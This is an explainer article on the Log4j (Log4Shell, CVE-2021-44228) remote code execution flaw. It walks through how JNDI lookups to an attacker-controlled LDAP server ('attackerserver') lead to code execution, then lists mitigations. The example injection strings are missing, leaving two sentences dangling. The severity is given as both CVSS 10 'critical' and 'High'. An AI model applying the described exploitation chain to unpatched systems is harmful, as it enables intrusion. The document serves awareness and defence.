Log4J Vulnerability

Log4J

Log4j is an open source logging framework in Java, which is distributed under the Apache Software License. This framework allows software developers to log various data within their application and it is part of the Apache Logging Services, a project of the Apache Software Foundation. Log4j is used in thousands of websites and applications, to perform functions like logging information which can be used for debugging and other purposes.

Log4j Vulnerability

Log4j Vulnerability is a critical vulnerability, affecting Apache Log4j 2 versions 2.0 to 2.14.1. This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud Security Team. NIST (National Institute of Standards and Technology) published a critical CVE in the National Vulnerability Database on December 10th, 2021 named CVE-2021–44228. Apache Software Foundation assigned the maximum CVSS severity rating of 10.

This vulnerability allows unauthenticated Remote Code Execution (RCE). Attackers can take advantage of it by just inserting a line of code like

This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam and VMWare.

Log4j Vulnerability Exploitation

Log4j easily logs user input and performs network lookups within the JNDI (Java Naming and Directory Interface) to obtain services from LDAP (Lightweight Directory Access Protocol). Log4j captures a message as a URL, fetches the correct response, and can execute code with full privileges. This vulnerability can be exploited in text by using a specific syntax.

The contents in log messages contain user-controlled data which attackers can insert JNDI references pointing to LDAP servers they control, ready to serve malicious Java classes that perform any action they choose. When Log4j finds the following string in a log message:

It instructs the JNDI to ask the LDAP server at “attackerserver” for the “exploit” object. By design, JNDI will execute Java classes rather than LDAP server references. If the LDAP server’s response references the URL https://attackerserver/exploit, JNDI will automatically request the file “exploit” from the web server and execute the response. This will give remote access to the application.

Log4j Vulnerability Mitigation

Disable Log4j library

Disabling software using the Log4j library is an effective measure, favoring controlled downtime over adversary-caused issues. This option could cause operational impacts and limit visibility into other issues.

Disable JNDI lookups or disable remote codebases

This option, while effective, may involve developer work and could impact functionality.

Disconnect affected stacks

Solution stacks not connected to agency networks pose a dramatically lower risk from attack. Consider temporarily disconnecting the stack from agency networks.

Isolate the system

Create a “vulnerable network” VLAN and segment the solution stack from the rest of the enterprise network.

Deploy a properly configured Web Application Firewall (WAF) in front of the solution stack

Deploying a WAF is an important, but incomplete, solution. While threat actors will be able to bypass this mitigation, the reduction in alerting will allow an agency SOC to focus on a smaller set of alerts.

Apply micropatch

There are several micropatches available. They are not a part of the official update but may limit agency risk.

Details

Name: Log4j or Log4Shell

Date: 9th Dec 2021 (exposed), 24th Nov 2021 (discovered)

CVE ID: CVE-2021–44228

Severity: High

Vulnerability: Remote Code Execution (RCE)